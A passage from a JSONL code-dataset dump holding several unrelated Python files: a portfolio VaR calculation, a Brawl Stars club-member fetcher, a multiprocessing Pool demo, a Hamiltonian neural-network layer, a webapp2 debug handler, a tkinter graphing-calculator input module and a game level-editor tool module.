Sthis[1]/Slast[1]*BSlast[1]\r\n \tAthis1 = Sthis[2]/Slast[2]*BSlast[2]\r\n \tBSthis = pd.concat([Cthis, Athis0, Athis1],axis=1)\r\n \t#print(BSthis)\r\n\r\n \tNetValue=Cthis+Athis0+Athis1\r\n \t#print(NetValue)\r\n\r\n \tdate = str(thisweek)\r\n \tBSthis.to_csv(BS+date+T, sep=' ', header=False, index=False)\r\n \treturn PL\r\n\r\ndef var_calc(thisweek,term):\r\n\tS = 'S' # prefix\r\n\tT = '.txt' # suffix\r\n\tBS = 'BS'\r\n\r\n\tnames = ['cash','tyo','ben']\r\n\tr = []\r\n\tfor name in names:\r\n\t\tFileName = name + '.csv'\r\n\t\tdf = pd.read_csv(FileName)\r\n\t\ta_df = df.values\r\n\t\titemcounter = 0\r\n\t\tfor item in a_df:\r\n\t\t\tif itemcounter ==0:\r\n\t\t\t\tr1 = []\r\n\t\t\t\titemcounter +=1\r\n\t\t\telse:\r\n\t\t\t\tvaluetoday = a_df[itemcounter][0]\r\n\t\t\t\tvalueyesterday = a_df[itemcounter-1][0]\r\n\t\t\t\treturntoday = (valuetoday-valueyesterday)/valueyesterday\r\n\t\t\t\tr1.append(returntoday)\r\n\t\t\t\titemcounter +=1\r\n\t\tr.append(r1)\r\n\r\n\tdf = pd.DataFrame(data = r, index = names)\r\n\t#print(df)\r\n\r\n\t#toyota = df.iloc[1,:]\r\n\t#sony = df.iloc[2,:]\r\n\r\n\tmu = df.mean(axis=1)\r\n\t#print(mu)\r\n\tdate = str(thisweek)\r\n\tFNBSthis = BS+date+T\r\n\tbs = pd.read_table(FNBSthis, sep=' ', names = names)\r\n\tbst = bs.T\r\n\r\n\tbsa = np.array(bs)\r\n\tbsta = 
np.array(bst)\r\n\t#print(bsa)\r\n\t#print(bsta)\r\n\r\n\tdot = np.dot(bsa, mu) #行列の内積\r\n\t#print(dot)\r\n\r\n\tcov = np.cov(df, rowvar = 1, bias = 1) #共分散行列\r\n\t#print(cov)\r\n\r\n\t#dot3 = np.dot(np.dot(bsa, cov), bsta)\r\n\t#print(dot3)\r\n\r\n\tdot3 = bsa@cov@bsta #行列の掛算3つ以上\r\n\t#print(dot3)\r\n\tT = term\r\n\tVaR = -dot*T + 2.33*np.sqrt(dot3*T)\r\n\t#print(VaR)\r\n\treturn VaR","repo_name":"kazutaka-lab/tech-base","sub_path":"my_function.py","file_name":"my_function.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15589942112","text":"from decouple import config\nfrom datetime import datetime\nimport os\nimport requests\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.pool import NullPool\n\nAPI_TOKEN = config('API_TOKEN')\nDATABASE_URL = config('DATABASE_URL')\nFIXIE_URL = config('FIXIE_URL')\nURI = DATABASE_URL[:8] + 'ql' + DATABASE_URL[8:]\n\ndate = datetime.utcnow()\n\nif date.weekday() == 2:\n\n club_tag = '#2YPY9LVV9'\n headers = {\n 'Authorization' : f'Bearer {API_TOKEN}',\n }\n proxies = {\n 'http' : os.environ.get('FIXIE_URL', ''),\n 'https' : os.environ.get('FIXIE_URL', ''),\n }\n response = requests.get(\n # the hashtag '#' is encoded as '%23' in the URL\n f'https://api.brawlstars.com/v1/clubs/%23{club_tag[1:]}/members',\n headers=headers,\n proxies=proxies,\n )\n club_members_list = response.json()['items']\n \n season = f'{date.year}-{date.isocalendar().week}'\n club_members_df = pd.DataFrame(\n {\n 'season' : [season] * len(club_members_list),\n 'player_tag' : [member['tag'] for member in club_members_list],\n 'player_name' : [member['name'] for member in club_members_list],\n 'trophies' : [member['trophies'] for member in club_members_list],\n },\n )\n \n engine = create_engine(URI, poolclass=NullPool)\n with engine.connect() as connection:\n club_members_df.to_sql(\n 'club_members',\n connection,\n if_exists='append',\n index=False\n )\n connection.execute(\n f''' INSERT INTO job_log (job_timestamp, job)\n VALUES('{date}', 'get_club_members.py'); '''\n )\n\n print('Script get_club_members.py executed successfully.')\n\nelse:\n print('Today is not Wednesday.')\n","repo_name":"pascalaigner/brawl-stars-club-league","sub_path":"scheduled_jobs/get_club_members.py","file_name":"get_club_members.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"34943596347","text":"from multiprocessing import Pool\nimport os, time, random\n\n''''\n当需要创建的⼦进程数量不多时,可以直接利⽤multiprocessing中的Process\n动态成⽣多个进程,但如果是上百甚⾄上千个⽬标,⼿动的去创建进程的⼯\n作量巨⼤,此时就可以⽤到multiprocessing模块提供的Pool⽅法。\n初始化Pool时,可以指定⼀个最⼤进程数,当有新的请求提交到Pool中时,\n如果池还没有满,那么就会创建⼀个新的进程⽤来执⾏该请求;但如果池中\n的进程数已经达到指定的最⼤值,那么该请求就会等待,直到池中有进程结\n束,才会创建新的进程来执⾏\n'''\n\n\ndef worker(msg):\n t_start = time.time()\n print(\"%s开始执⾏,进程号为%d\" % (msg, os.getpid()))\n # random.random()随机⽣成0~1之间的浮点数\n time.sleep(random.random() * 2)\n t_stop = time.time()\n print(msg, \"执⾏完毕,耗时%0.2f\" % (t_stop - t_start))\n\n\npo = Pool(3) # 定义⼀个进程池,最⼤进程数3\nfor i in range(0, 10):\n # Pool.apply_async(要调⽤的⽬标,(传递给⽬标的参数元祖,))\n # 每次循环将会⽤空闲出来的⼦进程去调⽤⽬标 如果超过了指定的最大数量 也会添加进去的\n # apply_async 是非堵塞的 apply是堵塞的\n po.apply_async(worker, (i,))\n # po.apply(worker, (i,))\n print(\"----start----\")\npo.close() # 关闭进程池,关闭后po不再接收新的请求\npo.join() # 等待po中所有⼦进程执⾏完成,必须放在close语句之后 不join池中的进程不会执行\nprint(\"-----end-----\")\n","repo_name":"zoushiqing/python","sub_path":"第二章 
python核心编程/第2节Linux系统编程/进程/进程池Pool.py","file_name":"进程池Pool.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35748016529","text":"\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\nfrom torch.nn.modules.module import Module\n\nimport torch.nn as nn\n# from torchdiffeq import odeint_adjoint as odeint\nfrom torchdiffeq import odeint as odeint\nimport geotorch\nimport os\n\n\n\ndef act1(x): \n act_main = torch.nn.ELU(inplace=False)\n return 0.5*(torch.pow(F.relu(x),2)+ act_main(x))\n\n######### option 2 ############\n#act = ln((exp(x)+1)/2) if x>0 and = -sqrt(|x-1|)+1 if x<0\ndef act2(xx): \n m = 1.1 ##m >=1\n a = 0.1\n x = a*xx\n return -F.relu(torch.sqrt(torch.abs(torch.minimum(x-1,torch.tensor(0)))+1e-8)-1) + m*torch.log((torch.exp(F.relu(x))+1)/2+1e-8)\n\n######### option 3 ############\n#act = x^m+0.5x if x>0 and = -sqrt(|x-1|)+1 if x<0\ndef act3(xx): \n m = 3 ##m>=2\n a = 0.1\n x = a*xx\n return -F.relu(torch.sqrt(torch.abs(torch.minimum(x-1,torch.tensor(0)))+1e-8)-1) + torch.pow(F.relu(x),m)+ 0.5*F.relu(x)\n\n\nclass my_act(nn.Module):\n def __init__(self, act):\n super(my_act, self).__init__()\n self.act = act\n \n def forward(self, x):\n return self.act(x)\n\n##################### pos_constraint for weight ################\n\n######### option 1 ############\n# def pos_constraint(x):\n# # act = torch.sigmoaid()\n# return torch.sigmoid(x)*0.001\n\n######### option 2 ############\ndef pos_constraint(x):\n# act = torch.sigmoaid()\n return torch.abs(x)\n\n\nclass ReHU(nn.Module):\n \"\"\" Rectified Huber unit\"\"\"\n def __init__(self, d):\n super().__init__()\n self.a = 1/d\n self.b = -d/2\n\n def forward(self, x):\n return torch.max(torch.clamp(torch.sign(x)*self.a/2*x**2,min=0,max=-self.b),x+self.b)\n \n \n \n\n \n \ndef batch_jacobian(func, x, create_graph=False):\n # x in shape (Batch, Length)\n def _func_sum(x):\n return func(x).sum(dim=0)\n\n return torch.autograd.functional.jacobian(_func_sum, x, create_graph=create_graph).permute(1,2,0)\n\nclass myLinear(nn.Module):\n def __init__(self, size_in):\n super().__init__()\n \n ## input --> f0 (2*dim, 2*dim) --> f1 (2*dim, 8*dim) --> f2 (8*dim, 2*dim) --> f3 (2*dim, 1)\n #### from f1 to f3, we need the weight to be postive, that's why we call pos_constraint() below\n ##### all activation function need to be convex and non-decreasing #######\n \n \n self.dim = size_in\n \n # self.act = my_act(act1)\n # self.act = act2\n self.act = ReHU(d=0.1)\n\n \n max_ = +0.001\n min_ = -0.001\n # max_ = +0.0002\n # min_ = -0.0002\n \n w1_z = torch.Tensor(self.dim*8, self.dim*2)\n self.w1_z = nn.Parameter(w1_z)\n b1 = torch.Tensor(self.dim*8)\n self.b1 = nn.Parameter(b1)\n \n w2_z = torch.Tensor(self.dim*2, self.dim*8)\n self.w2_z = nn.Parameter(w2_z)\n b2 = torch.Tensor(self.dim*2)\n self.b2 = nn.Parameter(b2)\n \n w3_z = torch.Tensor(1, self.dim*2)\n self.w3_z = nn.Parameter(w3_z)\n b3 = torch.Tensor(1)\n self.b3 = nn.Parameter(b3)\n \n self.w0_y = nn.Linear(in_features=2*self.dim,out_features=2*self.dim) ####w0_y is free, and no constraints\n \n \n ####### initial the parameters ###########\n self.b1.data.uniform_(min_, max_)\n self.w1_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w1_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w1_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n\n # torch.nn.init.normal_(self.w1_z)\n # torch.nn.init.normal_(self.b1)\n\n 
# torch.nn.init.xavier_uniform_(self.w1_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b1, gain=1.0)\n # torch.nn.init.constant_(self.b1, val=0.001)\n\n ####### initial the parameters ###########\n self.b2.data.uniform_(min_, max_)\n self.w2_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w2_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w2_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n # torch.nn.init.normal_(self.w2_z)\n # torch.nn.init.normal_(self.b2)\n\n # torch.nn.init.xavier_uniform_(self.w2_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b2, gain=1.0)\n # torch.nn.init.constant_(self.b2, val=0.001)\n\n ####### initial the parameters ###########\n self.b3.data.uniform_(min_, max_)\n self.w3_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w3_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w3_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n # torch.nn.init.normal_(self.w3_z)\n # torch.nn.init.normal_(self.b3)\n\n # torch.nn.init.xavier_uniform_(self.w3_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b3, gain=1.0)\n # torch.nn.init.constant_(self.b3, val=0.001)\n\n\n\n \n def forward(self, x):\n z1 = self.act(self.w0_y(x))\n \n w1_z = pos_constraint(self.w1_z)\n z2 = F.linear(z1, w1_z, bias=self.b1)\n z2 = self.act(z2)\n \n \n w2_z = pos_constraint(self.w2_z)\n z3 = F.linear(z2, w2_z, bias=self.b2)\n z3 = self.act(z3)\n \n \n w3_z = pos_constraint(self.w3_z)\n z4 = F.linear(z3, w3_z, bias=self.b3)\n z4 = self.act(z4)\n \n \n f = z4\n \n return f\n \nclass Hamilton_V2(nn.Module):\n def __init__(self, size_in):\n super().__init__()\n self.dim = size_in\n \n self.H = myLinear(self.dim)\n\n \n def forward(self,t, input_):\n ### input_ should be 2xdim as [x, v], where x is manifold position and v is the tangent vector\n ### If you only have v, set x as 0\n \n x = input_[...,0:self.dim]\n v = input_[...,self.dim:]\n \n \n H_derivatie = batch_jacobian(lambda xx: self.H(xx), input_, create_graph=True).squeeze()\n # print(H_derivatie.shape)\n \n dx = H_derivatie[...,0:self.dim]\n dv = -1*H_derivatie[...,self.dim:]\n\n \n out = torch.hstack([dx, dv])\n \n \n return out\n\nif __name__=='__main__':\n ######## select convex activation function ###########\n act = act1\n\n\n dim = 16\n con = Hamilton_V2(dim)\n a = torch.zeros(128,dim*2)\n b = con(a)","repo_name":"zknus/Hamiltonian-GNN","sub_path":"layers/H_2.py","file_name":"H_2.py","file_ext":"py","file_size_in_byte":6360,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"17327808549","text":"import webapp2\nimport urlparse\n\nimport tests\n\nimport types\nimport random\nimport os\nimport time\n\nclass MSDebugHandler( webapp2.RequestHandler ):\n\n def get( self, testname, path ):\n start_time = time.time()\n \n if len(path) == 0:\n path = \"/\"\n\n if path[0] != '/':\n path = \"/\" + path\n \n args = self.request.GET.dict_of_lists()\n \n for (k,v) in args.items():\n if type(v) == types.ListType and len(v) == 1:\n args[k] = v[0]\n \n # debug request\n test = getattr( tests, testname )\n status = None\n msg = None\n if test == None:\n status = 404\n msg = \"No such test '%s'\" % testname\n else:\n status, msg = test.test( path, args )\n\n self.response.status = status\n self.response.headers['X-Total-Time'] = str( int( (time.time() - start_time) * 1e9) )\n self.response.write( msg )\n return\n\n def put( self, _path ):\n 
pass","repo_name":"syndicate-storage/syndicate","sub_path":"ms/tests/debughandler.py","file_name":"debughandler.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"} +{"seq_id":"24854823973","text":"# handles modes besides graph3D, setting modes, and help\r\nfrom Graph3D import *\r\n\r\n# turns equation list to string\r\ndef formEquationString(equation):\r\n result = \"\"\r\n for entry in equation:\r\n result += str(entry)\r\n return result\r\n\r\ndef getCursorPosition(data):\r\n if len(data.inputs)==0:\r\n return [0,0]\r\n row = data.inputs[:data.cursorListPosition].count(\"\\n\")\r\n totalRows = data.inputs.count(\"\\n\")\r\n centerRow = totalRows/2\r\n textDY = (row-centerRow)*data.textLineHeight\r\n if data.cursorListPosition==0:\r\n textDX = 0\r\n elif data.inputs[data.cursorListPosition-1]==\"\\n\":\r\n textDX = 0\r\n else:\r\n lineStartIndex = data.cursorListPosition-1\r\n while True:\r\n if lineStartIndex==0:\r\n break\r\n elif data.inputs[lineStartIndex-1] != \"\\n\":\r\n lineStartIndex -= 1\r\n else:\r\n break\r\n lineDistance = 0\r\n for i in range(lineStartIndex, data.cursorListPosition):\r\n lineDistance += len(str(data.inputs[i]))\r\n textDX = lineDistance*data.textWidth\r\n data.cursorPosition = [textDX, textDY]\r\n\r\n################################################################################\r\n## KeyPressed\r\n################################################################################\r\n\r\ndef keyPressed3DOptions(event, data):\r\n if data.mode in [\"function3DList\", \"parametric3D2PList\", \"parametric3D1PList\"]:\r\n keyPressed3DList(event, data)\r\n elif data.mode in [\"function3DInput\", \"parametric3D2PInput\", \"parametric3D1PInput\"]:\r\n keyPressed3DInput(event, data)\r\n\r\ndef keyPressed3DList(event, data):\r\n if data.mode==\"function3DList\":\r\n graphList = data.graphsFunction3D\r\n boxFactor = 1\r\n elif data.mode==\"parametric3D2PList\":\r\n graphList = data.graphsParametric3D2P\r\n boxFactor = 2\r\n elif data.mode==\"parametric3D1PList\":\r\n graphList = data.graphsParametric3D1P\r\n boxFactor = 2\r\n boxHeight = data.equationBoxSize[1]*boxFactor\r\n if event.keysym==\"Up\":\r\n if data.listScroll<0:\r\n data.listScroll += data.listScrollSpeed\r\n elif event.keysym==\"Down\":\r\n if data.equationBoxSize[1]+(len(graphList)+1)*boxHeight+data.listScroll>=data.height:\r\n data.listScroll -= data.listScrollSpeed\r\n\r\ndef keyPressed3DInput(event, data):\r\n if data.mode==\"function3DInput\":\r\n allowedKeysym = \"1234567890xyzep\"\r\n elif data.mode==\"parametric3D2PInput\":\r\n allowedKeysym = \"1234567890xyztuep\"\r\n elif data.mode==\"parametric3D1PInput\":\r\n allowedKeysym = \"1234567890xyztep\"\r\n \r\n if event.keysym in allowedKeysym or event.char in data.extraKeys or event.keysym==\"Return\":\r\n if event.keysym==\"p\":\r\n data.inputs.insert(data.cursorListPosition, \"π\")\r\n elif event.keysym==\"Return\":\r\n data.inputs.insert(data.cursorListPosition, \"\\n\")\r\n else:\r\n data.inputs.insert(data.cursorListPosition, event.char)\r\n data.cursorListPosition += 1\r\n elif event.keysym==\"BackSpace\":\r\n if data.cursorListPosition>0:\r\n data.inputs.pop(data.cursorListPosition-1)\r\n data.cursorListPosition -= 1\r\n elif event.keysym==\"Left\":\r\n if data.cursorListPosition>0:\r\n data.cursorListPosition -= 1\r\n elif event.keysym==\"Right\":\r\n if data.cursorListPosition=boxHeight/boxFactor:\r\n whichFunction = 
int((event.y-boxHeight/boxFactor-data.listScroll)/boxHeight)\r\n if whichFunction==len(graphList):\r\n data.modifyIndex = \"new\"\r\n data.mode = inputMode\r\n elif whichFunction=topLeft[0] and event.y>=topLeft[1]:\r\n col = int((event.x-topLeft[0])/buttonWidth)\r\n row = int((event.y-topLeft[1])/buttonHeight)\r\n if (row,col) == (0,0):\r\n if data.keyboardMode==\"trig\":\r\n data.keyboardMode = \"inv\"\r\n else:\r\n data.keyboardMode = \"trig\"\r\n elif keyMask[row][col]==1:\r\n data.inputs.insert(data.cursorListPosition, keys[row][col])\r\n data.cursorListPosition += 1\r\n getCursorPosition(data)\r\n\r\n################################################################################\r\n## DRAW\r\n################################################################################\r\n\r\ndef drawOptions3DMode(canvas, data):\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draws other boxes\r\n boxWidth, boxHeight = data.options3DBoxSize[0], data.options3DBoxSize[1]\r\n canvas.create_rectangle((data.width/2-boxWidth/2,boxHeight),\\\r\n (data.width/2+boxWidth/2,2*boxHeight), width=1)\r\n canvas.create_text((data.width/2,3*boxHeight/2),\\\r\n text=\"Functions\", font=\"Arial \"+str(int(boxHeight/4)))\r\n \r\n canvas.create_rectangle((data.width/2-boxWidth/2,2*boxHeight),\\\r\n (data.width/2+boxWidth/2,3*boxHeight), width=1)\r\n canvas.create_text((data.width/2,5*boxHeight/2),\\\r\n text=\"Parametric (2 Parameters)\", font=\"Arial \"+str(int(boxHeight/4)))\r\n \r\n canvas.create_rectangle((data.width/2-boxWidth/2,3*boxHeight),\\\r\n (data.width/2+boxWidth/2,4*boxHeight), width=1)\r\n canvas.create_text((data.width/2,7*boxHeight/2),\\\r\n text=\"Parametric (1 Parameter)\", font=\"Arial \"+str(int(boxHeight/4)))\r\n\r\n\r\ndef draw3DList(canvas, data):\r\n if data.mode==\"function3DList\":\r\n graphList = data.graphsFunction3D\r\n boxFactor = 1\r\n elif data.mode==\"parametric3D2PList\":\r\n graphList = data.graphsParametric3D2P\r\n boxFactor = 2\r\n elif data.mode==\"parametric3D1PList\": \r\n graphList = data.graphsParametric3D1P\r\n boxFactor = 2\r\n # draws every 3D function\r\n boxWidth, boxHeight = data.equationBoxSize[0], data.equationBoxSize[1]*boxFactor\r\n margin = data.width/20\r\n for i in range(len(graphList)+1):\r\n canvas.create_rectangle((0,boxHeight*i+data.equationBoxSize[1]+data.listScroll),\\\r\n (boxWidth,boxHeight*(i+1)+data.equationBoxSize[1]+data.listScroll), width=1)\r\n # add function\r\n if i==len(graphList):\r\n canvas.create_text((data.width/2,boxHeight*(i+0.5)+data.equationBoxSize[1]+data.listScroll),\\\r\n text=\"+\", fill=\"lime green\", font=\"Arial \"+str(int(boxHeight/2/boxFactor)))\r\n # existing functions\r\n else:\r\n canvas.create_text((margin,boxHeight*(i+0.5)+data.equationBoxSize[1]+data.listScroll),\\\r\n anchor=\"w\", text=formEquationString(graphList[i].display),\\\r\n font=\"Courier \"+str(int(boxHeight/5/boxFactor)))\r\n canvas.create_rectangle((0,0), (data.width,data.equationBoxSize[1]), width=0, fill=\"white\")\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n\r\n\r\ndef draw3DInput(canvas, data):\r\n if 
data.mode==\"function3DInput\":\r\n keyMask = data.function3DKeyMask\r\n elif data.mode==\"parametric3D2PInput\":\r\n keyMask = data.parametric3D2PKeyMask\r\n elif data.mode==\"parametric3D1PInput\": \r\n keyMask = data.parametric3D1PKeyMask\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draw Go box\r\n canvas.create_rectangle((data.width-boxWidth,0), (data.width,boxHeight), width=1)\r\n canvas.create_text((data.width-boxWidth/2,boxHeight/2), text=\"Go\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draw Delete box\r\n if data.modifyIndex != \"new\":\r\n canvas.create_rectangle((data.width-2*boxWidth,0), (data.width-boxWidth,boxHeight), width=1)\r\n canvas.create_text((data.width-3*boxWidth/2,boxHeight/2), fill=\"red\", text=\"Delete\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n \r\n if data.keyboardMode==\"trig\":\r\n keys = data.calcKeyboardTrig\r\n else:\r\n keys = data.calcKeyboardInv\r\n numCols = len(keys[0])\r\n numRows = len(keys)\r\n buttonWidth = data.width/numCols\r\n buttonHeight = buttonWidth*2/3\r\n topLeft = [0, data.height-numRows*buttonHeight]\r\n for row in range(numRows):\r\n for col in range(numCols):\r\n if keyMask[row][col]==1:\r\n boxColor = \"white\"\r\n textColor = \"black\"\r\n else:\r\n boxColor = \"gray70\"\r\n textColor = \"gray30\"\r\n canvas.create_rectangle((topLeft[0]+col*buttonWidth,topLeft[1]+row*buttonHeight),\\\r\n (topLeft[0]+(col+1)*buttonWidth,topLeft[1]+(row+1)*buttonHeight), width=1, fill=boxColor)\r\n canvas.create_text((topLeft[0]+(col+0.5)*buttonWidth,topLeft[1]+(row+0.5)*buttonHeight),\\\r\n text=keys[row][col], fill=textColor, font=\"Courier \"+str(int(buttonHeight/3)))\r\n margin = data.width/20\r\n canvas.create_text((margin,data.height/3), anchor=\"w\", text=formEquationString(data.inputs),\\\r\n font=\"Courier \"+str(int(buttonHeight/2)))\r\n textHeight = data.textHeight\r\n textWidth = data.textWidth\r\n canvas.create_line((margin+data.cursorPosition[0],data.height/3+data.cursorPosition[1]-textHeight/2),\\\r\n (margin+data.cursorPosition[0],data.height/3+data.cursorPosition[1]+textHeight/2), width=1)\r\n","repo_name":"axu682/3D-Graphing-Calculator","sub_path":"InputModes.py","file_name":"InputModes.py","file_ext":"py","file_size_in_byte":14435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33704547375","text":"from portal import colors\nfrom portal.geometry import Position\nfrom portal.wall import Wall, PortalWall, Ledge, Door, Grill\nfrom portal.entity import Portal, Cube, Button\n\nclass Tool:\n def __init__(self, canvas, level):\n self.canvas = canvas\n self.level = level\n self.setup()\n\n def setup(self):\n pass\n\n def mousedown(self, x, y):\n pass\n\n def mousemove(self, x, y):\n pass\n\n def mouseup(self, x, y):\n pass\n\nclass PlayerTool(Tool):\n name = 'Place player'\n def mousedown(self, x, y):\n p = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.start.move_to(p)\n self.level.player.move_to(p)\n self.canvas.redraw()\n\nclass GoalTool(Tool):\n name = 'Place goal'\n def mousedown(self, x, y):\n p = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.goal.move_to(p)\n self.canvas.redraw()\n\n\nclass SegmentTool(Tool):\n def setup(self):\n self.pos1 = None\n\n def mousedown(self, x, y):\n self.pos1 = 
Position(round(x), round(y))\n\n def mousemove(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(round(x), round(y))\n self.canvas.redraw()\n if self.pos1.pos() != pos2.pos():\n segment = self._make_segment(self.pos1, pos2)\n segment.draw(self.canvas)\n\n def mouseup(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(round(x), round(y))\n if self.pos1.pos() != pos2.pos():\n segment = self._make_segment(self.pos1, pos2)\n self.level.walls.append(segment)\n self.canvas.redraw()\n self.pos1 = None\n\n def _closest_position(self, x, y):\n if abs(x - self.pos1.x) > abs(y - self.pos1.y):\n return Position(x, self.pos1.y)\n else:\n return Position(self.pos1.x, y)\n\n def _make_segment(self, pos1, pos2):\n raise NotImplementedError\n\nclass WallTool(SegmentTool):\n name = 'Wall'\n def _make_segment(self, pos1, pos2):\n return Wall(pos1, pos2)\n\nclass PortalWallTool(SegmentTool):\n name = 'Portalable wall'\n def _make_segment(self, pos1, pos2):\n return PortalWall(pos1, pos2)\n\nclass LedgeTool(SegmentTool):\n name = 'Ledge'\n def _make_segment(self, pos1, pos2):\n return Ledge(pos1, pos2)\n\nclass DoorTool(SegmentTool):\n name = 'Door'\n def _make_segment(self, pos1, pos2):\n return Door(pos1, pos2, [])\n\nclass GrillTool(SegmentTool):\n name = 'Grill'\n def _make_segment(self, pos1, pos2):\n return Grill(pos1, pos2)\n\nclass PortalTool(Tool):\n def setup(self):\n self.pos1 = None\n\n def mousedown(self, x, y):\n self.pos1 = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n\n def mousemove(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(x, y)\n self.canvas.redraw()\n if self.pos1.pos() != pos2.pos():\n portal = self._make_portal(self.pos1, pos2)\n portal.draw(self.canvas)\n\n def mouseup(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(x, y)\n if self.pos1.pos() != pos2.pos():\n portal = self._make_portal(self.pos1, pos2)\n self.level.add_entity(portal)\n self.canvas.redraw()\n self.pos1 = None\n\n def _closest_position(self, x, y):\n x = round(x * 2) * 0.5\n y = round(y * 2) * 0.5\n if x == self.pos1.x and y == self.pos1.y:\n return Position(x, y)\n if abs(x - self.pos1.x) > abs(y - self.pos1.y):\n if x > self.pos1.x:\n return Position(self.pos1.x + 1, self.pos1.y)\n else:\n return Position(self.pos1.x - 1, self.pos1.y)\n else:\n if y > self.pos1.y:\n return Position(self.pos1.x, self.pos1.y + 1)\n else:\n return Position(self.pos1.x, self.pos1.y - 1)\n\n def _make_portal(self, pos1, pos2):\n raise NotImplementedError\n\nclass Portal1Tool(PortalTool):\n name = 'Orange portal'\n def _make_portal(self, pos1, pos2):\n return Portal(pos1, pos2, 'portal1')\n\nclass Portal2Tool(PortalTool):\n name = 'Blue portal'\n def _make_portal(self, pos1, pos2):\n return Portal(pos1, pos2, 'portal2')\n\nclass CubeTool(Tool):\n name = 'Cube'\n def mousedown(self, x, y):\n cube = Cube(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.add_entity(cube)\n self.canvas.redraw()\n\nclass ButtonTool(Tool):\n name = 'Button'\n def mousedown(self, x, y):\n button = Button(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.add_entity(button)\n self.canvas.redraw()\n\nclass TriggerTool(Tool):\n name = 'Connect door to button'\n def setup(self):\n self.door = None\n self.button = None\n\n def mousedown(self, x, y):\n door = self._get_door(x, y)\n button = self._get_button(x, y)\n if door and button:\n if door.center().distance(Position(x, y)) < button.distance(Position(x, y)):\n self.door = door\n else:\n self.button = button\n elif door:\n self.door = door\n elif button:\n 
self.button = button\n\n def mousemove(self, x, y):\n if self.door:\n self.canvas.redraw()\n button = self._get_button(x, y)\n if button:\n self._draw_trigger(self.door.center(), button)\n else:\n self._draw_trigger(self.door.center(), Position(x, y))\n elif self.button:\n self.canvas.redraw()\n door = self._get_door(x, y)\n if door:\n self._draw_trigger(self.button, door.center())\n else:\n self._draw_trigger(self.button, Position(x, y))\n\n def mouseup(self, x, y):\n if self.door:\n button = self._get_button(x, y)\n if button and button not in self.door.triggers:\n self.door.triggers.append(button)\n elif self.button:\n door = self._get_door(x, y)\n if door and self.button not in door.triggers:\n door.triggers.append(self.button)\n self.door = None\n self.button = None\n self.canvas.redraw()\n\n def _draw_trigger(self, pos1, pos2):\n self.canvas.create_line(pos1.x, pos1.y, pos2.x, pos2.y,\n width=2.0,\n dash=(8, 8),\n fill=colors.TRIGGER)\n\n def _get_door(self, x, y):\n for wall in self.level.walls:\n if isinstance(wall, Door) and wall.center().distance(Position(x, y)) < 0.5:\n return wall\n\n def _get_button(self, x, y):\n for entity in self.level.entities:\n if isinstance(entity, Button) and entity.distance(Position(x, y)) < 0.5:\n return entity\n\nclass EraserTool(Tool):\n name = 'Eraser'\n def setup(self):\n self.last_x = None\n self.last_y = None\n\n def mousedown(self, x, y):\n self._remove_entities(x, y)\n self.canvas.redraw()\n self.last_x = x\n self.last_y = y\n\n def mousemove(self, x, y):\n if self.last_x is not None and self.last_y is not None:\n self._remove_entities(x, y)\n self._remove_walls(self.last_x, self.last_y, x, y)\n self.canvas.redraw()\n self.last_x = x\n self.lats_y = y\n\n def mouseup(self, x, y):\n self.last_x = None\n self.last_y = None\n\n def _remove_entities(self, x, y):\n to_remove = []\n for e in self.level.entities:\n if e.x is not None and e.y is not None and e.distance(Position(x, y)) < 0.2:\n to_remove.append(e)\n for e in to_remove:\n self.level.remove_entity(e)\n\n def _remove_walls(self, x1, y1, x2, y2):\n to_remove = []\n for wall in self.level.walls:\n if 